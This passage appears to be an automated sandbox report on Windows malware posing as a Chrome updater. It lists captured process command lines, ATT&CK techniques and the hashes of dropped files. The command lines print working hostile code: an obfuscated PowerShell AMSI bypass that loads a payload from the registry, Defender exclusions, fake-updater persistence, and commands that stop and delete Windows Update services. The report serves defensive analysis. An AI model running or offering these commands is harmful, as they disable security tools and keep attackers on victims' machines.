Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+'e'+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+'ryM'+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+''+'l'+'a'+[Char](115)+''+'s'+''+[Char](44)+'P'+'u'+'bli'+[Char](99)+','+'S'+''+[Char](101)+''+'a'+''+[Char](108)+'e'+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+'i'+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+','+''+'A'+'u'+[Char](116)+''+'o'+''+[Char](67)+''+'l'+''+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$waJsBBGtASL.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+'e'+''+'c'+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'ub'+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$WIwaWfcprYImqx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+'i'+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+'age'+[Char](100)+'');$waJsBBGtASL.DefineMethod(''+[Char](73)+'nv'+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+','+'Hid'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+'i'+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+'l'+''+[Char](111)+'t'+','+''+[Char](86)+'irt'+'u'+'a'+'l'+'',$gEuEtAttsP,$WIwaWfcprYImqx).SetImplementationFlags('Ru'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+'M'+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $waJsBBGtASL.CreateType();}$KgoclaDvDHQUY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+'t'+[Char](101)+'m.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+'r'+''+'o'+'s'+'o'+'f'+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+'Un'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'Kg'+'o'+''+[Char](99)+'l'+[Char](97)+''+[Char](68)+''+'v'+''+[Char](68)+''+[Char](72)+''+[Char](81)+''+[Char](85)+''+'Y'+'');$FLJErVjSmROzom=$KgoclaDvDHQUY.GetMethod(''+'F'+''+'L'+''+[Char](74)+''+'E'+''+'r'+''+'V'+''+[Char](106)+''+[Char](83)+''+'m'+''+[Char](82)+''+[Char](79)+''+'z'+''+'o'+'m',[Reflection.BindingFlags]''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+','+'S'+'t'+'a'+''+[Char](116)+'ic',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GHpQlvBONgIdVvJglJw=kfFOWYirmgby @([String])([IntPtr]);$ubspGBJbswYkrklUarAeeg=kfFOWYirmgby @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PmnIFkPwpZj=$KgoclaDvDHQUY.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+''+'H'+''+'a'+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+'ll')));$amPrLlUgEKTmEA=$FLJErVjSmROzom.Invoke($Null,@([Object]$PmnIFkPwpZj,[Object](''+[Char](76)+''+'o'+''+'a'+''+[Char](100)+'Li'+'b'+''+[Char](114)+'ar'+'y'+'A')));$PbkUShTclfpZzascv=$FLJErVjSmROzom.Invoke($Null,@([Object]$PmnIFkPwpZj,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+'ect')));$VfJKtnY=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($amPrLlUgEKTmEA,$GHpQlvBONgIdVvJglJw).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$TZLzhVMkgPUZonBeJ=$FLJErVjSmROzom.Invoke($Null,@([Object]$VfJKtnY,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+'c'+''+'a'+'n'+'B'+''+'u'+'f'+[Char](102)+'e'+[Char](114)+'')));$cpsxuacRwt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PbkUShTclfpZzascv,$ubspGBJbswYkrklUarAeeg).Invoke($TZLzhVMkgPUZonBeJ,[uint32]8,4,[ref]$cpsxuacRwt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TZLzhVMkgPUZonBeJ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PbkUShTclfpZzascv,$ubspGBJbswYkrklUarAeeg).Invoke($TZLzhVMkgPUZonBeJ,[uint32]8,0x20,[ref]$cpsxuacRwt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+'W'+''+'A'+'R'+[Char](69)+'').GetValue(''+'d'+'i'+[Char](97)+''+'l'+''+[Char](101)+''+[Char](114)+'s'+'t'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
1⤵
PID:3092

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:lOgYtSuZJNGC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$meGRobqSNeaQNQ,[Parameter(Position=1)][Type]$iHdLGCcUHF)$McDSBPSxroi=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+''+'d'+''+'D'+'e'+'l'+''+[Char](101)+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nMem'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType('My'+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+'at'+[Char](101)+''+[Char](84)+'y'+'p'+''+'e'+'',''+[Char](67)+'l'+[Char](97)+'ss,'+[Char](80)+''+[Char](117)+'blic'+[Char](44)+''+[Char](83)+'e'+'a'+'le'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+','+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+'s'+'s',[MulticastDelegate]);$McDSBPSxroi.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+'e'+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+',P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$meGRobqSNeaQNQ).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+'a'+[Char](103)+''+'e'+''+[Char](100)+'');$McDSBPSxroi.DefineMethod('I'+'n'+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'','P'+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+','+'H'+'i'+[Char](100)+'eB'+[Char](121)+'Si'+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$iHdLGCcUHF,$meGRobqSNeaQNQ).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+'g'+'e'+''+[Char](100)+'');Write-Output $McDSBPSxroi.CreateType();}$WNdeaaEQzapmZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'ste'+[Char](109)+'.'+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+'c'+'r'+''+[Char](111)+''+'s'+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+'.'+'Uns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](87)+''+[Char](78)+''+[Char](100)+'e'+[Char](97)+''+'a'+''+'E'+'Q'+[Char](122)+'ap'+'m'+''+[Char](90)+'');$IxOElFHvRXZxbm=$WNdeaaEQzapmZ.GetMethod(''+[Char](73)+''+'x'+'OE'+'l'+''+'F'+'H'+'v'+''+[Char](82)+'X'+[Char](90)+'xb'+[Char](109)+'',[Reflection.BindingFlags]'P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+''+'t'+'ic',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$xglcbXdzUMfrtwSPFgZ=lOgYtSuZJNGC @([String])([IntPtr]);$knFTBMSZpsZSTiEpAfjkOS=lOgYtSuZJNGC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kLcqamxrTud=$WNdeaaEQzapmZ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+'ule'+[Char](72)+''+'a'+'n'+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+[Char](101)+'l'+[Char](51)+'2.'+'d'+''+'l'+'l')));$vTypBchsCGbQzS=$IxOElFHvRXZxbm.Invoke($Null,@([Object]$kLcqamxrTud,[Object](''+'L'+''+[Char](111)+'a'+[Char](100)+'L'+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$OsYSVpOfKlqZrQlTO=$IxOElFHvRXZxbm.Invoke($Null,@([Object]$kLcqamxrTud,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+'ua'+'l'+''+[Char](80)+''+'r'+''+'o'+''+'t'+''+[Char](101)+'c'+[Char](116)+'')));$BSJrpup=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vTypBchsCGbQzS,$xglcbXdzUMfrtwSPFgZ).Invoke(''+'a'+'m'+[Char](115)+'i'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$hmbWMCHLANiEfqSyS=$IxOElFHvRXZxbm.Invoke($Null,@([Object]$BSJrpup,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+'S'+'c'+'a'+'n'+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+'e'+[Char](114)+'')));$mixHapjBTS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OsYSVpOfKlqZrQlTO,$knFTBMSZpsZSTiEpAfjkOS).Invoke($hmbWMCHLANiEfqSyS,[uint32]8,4,[ref]$mixHapjBTS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$hmbWMCHLANiEfqSyS,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OsYSVpOfKlqZrQlTO,$knFTBMSZpsZSTiEpAfjkOS).Invoke($hmbWMCHLANiEfqSyS,[uint32]8,0x20,[ref]$mixHapjBTS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+'RE').GetValue(''+[Char](100)+''+'i'+''+'a'+'ler'+[Char](115)+'t'+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
1⤵
PID:3836

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:4964

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe rfekwksssqrk
2⤵
PID:988

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{1f6e085b-13db-4e39-9132-734448a62126}
1⤵
PID:5036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:4480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rnspek#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:984

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:760

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:2924

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:3672

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:4980

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:4528

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:1344

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2436

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
3.7MB

MD5
2633b7825a18e339d1c339a2475906e6

SHA1
a21077a1e5a72b9d8f9d4011d4b0cc659daf9cc8

SHA256
a3576399f5fb369a3ecbbabf804c4e8950eaccea304949eae965f2cf28e0219f

SHA512
14bd8873dbc3dd86bf743fa7927ec5adf9d4e78704181f33f849ef7c5d257588a3d96f2198b19d0fd69f5a7da67c3b610f37ceb8ec6e58da85df07be12025739

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
d584df872086c0f7442a664a33d38fe5

SHA1
f0fad100fda4e8bb82ce5bc7d03953605ac53a5d

SHA256
fdb68980ecdb4c9b464cc6a07ec410b2c7dda5b01240a0a8c860e9a94fe372bc

SHA512
5232ebc39075096fa6ae5ae6d5b7b4580003e0be87779281c27fc1e0646500c76ca2178205ccc06e3b85df02a3a88ddb864723a3978cc97a9d63fa07196cdd79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
e6aef0f4b2ce3d43f5fd98d4264cff54

SHA1
233f6dc8bcc34ca234ba5e96a4ed08cb682aeaa6

SHA256
db5bce3e0a922d7682db5d6f8ff86e6f16444a3018d51f000c1ed2d2d1ebd5dd

SHA512
b76750b13e68dde07e214d857bc2393e387e8860ed33698507274adacd33d86c7b81f6891a7d4b5747d14848d170fc758a4465b13dfac4d002ff9535798cfcfb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
91532118eebf3739edb9ef5d8228f39c

SHA1
b1881a26483ce931f764f94af0045ff9c308ab93

SHA256
ca84d2b4b21eb877a7211c8154813c6850669b6708441922ea076e68d86c5866

SHA512
2b804d864b725543508bbd8b7f8c69e65e127ff272e6c5475c1b45a3ce91e6b6dbcb40f8e542829a6a68bb91aaa958de64776ecdb2e37a480303da1973ee2965

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
91532118eebf3739edb9ef5d8228f39c

SHA1
b1881a26483ce931f764f94af0045ff9c308ab93

SHA256
ca84d2b4b21eb877a7211c8154813c6850669b6708441922ea076e68d86c5866

SHA512
2b804d864b725543508bbd8b7f8c69e65e127ff272e6c5475c1b45a3ce91e6b6dbcb40f8e542829a6a68bb91aaa958de64776ecdb2e37a480303da1973ee2965

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2859723520e4b65c17cf8d7c60f73e20

SHA1
924815371b011d08a127d3fa101aac7e3565b500

SHA256
6cc32acefd76b1887a77fbaa397742ed12397d41daefdac36a36f2878639eb54

SHA512
577166a8d618424ef0408599804cf4b8e8bdf110460f6a6c4020734bb56bb103c11422ea01302852cc77e6910326ddb5b7cbba3f43868d7603bc01d0eae56ad6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
26606d08f8794e0290b853b3a9dc2699

SHA1
28e3889f93a6062fffe80515e56c87a805e3a559

SHA256
22e4ad5009d3e9d3d454c1c4628d80e77fe1bc830599b4c72b17d280103fd124

SHA512
fdbcf654ab1dbf660ea70ab4866dc8b92879c1362d304ae1904a48813165d1546f5807a696cf0f8344738a6b22c8093179b8d12c434e49d86f0f8d7cde574866

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
26606d08f8794e0290b853b3a9dc2699

SHA1
28e3889f93a6062fffe80515e56c87a805e3a559

SHA256
22e4ad5009d3e9d3d454c1c4628d80e77fe1bc830599b4c72b17d280103fd124

SHA512
fdbcf654ab1dbf660ea70ab4866dc8b92879c1362d304ae1904a48813165d1546f5807a696cf0f8344738a6b22c8093179b8d12c434e49d86f0f8d7cde574866

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
f147eb2c2a5e31697fadcb339db2d97c

SHA1
f18c8e326bda6abca649c980ffdaacc490676ab1

SHA256
3b67ea8988dddd63d8a2b5f2b858ef62189cb932ddb8ecae3feac83f995dc7e3

SHA512
99392a7f9b4a938c24ec0a24c35546bfe6d50e2b1ad1aa9359550ac393ef14bf40e54fd8d2275223f48adaadfe1020be5e11bcc90fa5126779ec02bfeaa79396

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
049f7d691cafda63bbc907c5723cf291

SHA1
32825a603e4b1460012ee7dc5d71d822c170b24e

SHA256
00c876d0f7769a9a27f8888e8c52becb5f9d04b2c13a826ca95cd0b6816eb88f

SHA512
b85e6326deacf06cb6db740090186cda183e34a915bc51fcf8ffdb872b34e51949280a962f0fa90974b7257acf9763b276b4f14945bd44567ebe07dadb1e6cfc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
7e476104a1557a9acb91466310a2ac44

SHA1
b831c83fd14951eb549535999d467913fa7bb5d7

SHA256
93660e9030757d4dde0e161ee0b65aa051596cc83ad42c9b51ea5137880ae620

SHA512
08095381ebc5420f14cf063ff2b1060bbb2d2e149502def43df881f0218e9ac0656fc9e5218ef9e17b606c4e6d88dbaa251953b3272c477a965289c4c545d219

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
7488a9409c7d8c8cca1e70427c87ad6c

SHA1
c1410cc126bf9fafba5343de025a221b70ea159b

SHA256
3b4fff2d99b8196cb3d85b8ae9441bc36a9a887b00e4b6fc80e62859db51b21f

SHA512
fdc9db9ee3997876653517db3f551d633d683fd19c12f468db22b3fde5dd0efcb5e0ecd0753609264868487f22f18e8614d7dfe9fc8510836d703590528081b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe
Filesize
960KB

MD5
367dd476c0574f68f53020529c1b2623

SHA1
747d93ffd8afbe48203ac7b19b5c087072be6670

SHA256
efb4ed64cbd3ed0031b494d87402520f4401c47684539bb4a09fb8e02024085f

SHA512
c4e13af20acab668b84d0d22fd757fd56f2202555495dd038af8bce6f4630bcce3b834437214013e7710de28c8642d79b1315c4e33481bc71b4900972428f05d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe
Filesize
960KB

MD5
367dd476c0574f68f53020529c1b2623

SHA1
747d93ffd8afbe48203ac7b19b5c087072be6670

SHA256
efb4ed64cbd3ed0031b494d87402520f4401c47684539bb4a09fb8e02024085f

SHA512
c4e13af20acab668b84d0d22fd757fd56f2202555495dd038af8bce6f4630bcce3b834437214013e7710de28c8642d79b1315c4e33481bc71b4900972428f05d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe
Filesize
960KB

MD5
367dd476c0574f68f53020529c1b2623

SHA1
747d93ffd8afbe48203ac7b19b5c087072be6670

SHA256
efb4ed64cbd3ed0031b494d87402520f4401c47684539bb4a09fb8e02024085f

SHA512
c4e13af20acab668b84d0d22fd757fd56f2202555495dd038af8bce6f4630bcce3b834437214013e7710de28c8642d79b1315c4e33481bc71b4900972428f05d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cypher.exe
Filesize
112KB

MD5
279819a8325c9ed6306dc236ac0c78e1

SHA1
84506ecb5534e132a4aea88c4a3a7504711d8733

SHA256
c2520b13d81029f5ce2318e636245c431dbfd8e633e2960ef2da30907c36f3ab

SHA512
23e68fa2fd57b980f7d5aadef9c3ac9e8c0ffa34f8c4c55f97d33d789c936dfce434701aa83c6f380976d78bd61d3be0584eeb4f633f7c85f80a401db2212f45

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cypher.exe
Filesize
112KB

MD5
279819a8325c9ed6306dc236ac0c78e1

SHA1
84506ecb5534e132a4aea88c4a3a7504711d8733

SHA256
c2520b13d81029f5ce2318e636245c431dbfd8e633e2960ef2da30907c36f3ab

SHA512
23e68fa2fd57b980f7d5aadef9c3ac9e8c0ffa34f8c4c55f97d33d789c936dfce434701aa83c6f380976d78bd61d3be0584eeb4f633f7c85f80a401db2212f45

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cypher.exe
Filesize
112KB

MD5
279819a8325c9ed6306dc236ac0c78e1

SHA1
84506ecb5534e132a4aea88c4a3a7504711d8733

SHA256
c2520b13d81029f5ce2318e636245c431dbfd8e633e2960ef2da30907c36f3ab

SHA512
23e68fa2fd57b980f7d5aadef9c3ac9e8c0ffa34f8c4c55f97d33d789c936dfce434701aa83c6f380976d78bd61d3be0584eeb4f633f7c85f80a401db2212f45

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hmpggzwh.rsd.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\directx.exe
Filesize
275KB

MD5
9cfc6a421eb592f551d6950493c6df4c

SHA1
d46b29bacfddd26d80d64d6e66bd9488d91a22d7

SHA256
5d95da32a776780b6e8ffb4b4cdc8bcc1a296357a7f614b9e55a300ce5808a82

SHA512
64e1c4faa7ae1126e733ee4849e2e68ea5aec03325bd2ca739524a5f53a5b532bf570a2b7b098f78e21fd2673a09d33340c97a947191ea3f01f16bf91350b078

Download Submit
C:\Users\Admin\AppData\Local\Temp\directx.exe
Filesize
275KB

MD5
9cfc6a421eb592f551d6950493c6df4c

SHA1
d46b29bacfddd26d80d64d6e66bd9488d91a22d7

SHA256
5d95da32a776780b6e8ffb4b4cdc8bcc1a296357a7f614b9e55a300ce5808a82

SHA512
64e1c4faa7ae1126e733ee4849e2e68ea5aec03325bd2ca739524a5f53a5b532bf570a2b7b098f78e21fd2673a09d33340c97a947191ea3f01f16bf91350b078

Download Submit
C:\Users\Admin\AppData\Local\Temp\directx.exe
Filesize
275KB

MD5
9cfc6a421eb592f551d6950493c6df4c

SHA1
d46b29bacfddd26d80d64d6e66bd9488d91a22d7

SHA256
5d95da32a776780b6e8ffb4b4cdc8bcc1a296357a7f614b9e55a300ce5808a82

SHA512
64e1c4faa7ae1126e733ee4849e2e68ea5aec03325bd2ca739524a5f53a5b532bf570a2b7b098f78e21fd2673a09d33340c97a947191ea3f01f16bf91350b078

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxCrack.exe
Filesize
95KB

MD5
af8a3a1cb685f9e1fdcc970bd4ca420f

SHA1
9342d6f660df293516c2932c905fe4411474e321

SHA256
39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

SHA512
04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxCrack.exe
Filesize
95KB

MD5
af8a3a1cb685f9e1fdcc970bd4ca420f

SHA1
9342d6f660df293516c2932c905fe4411474e321

SHA256
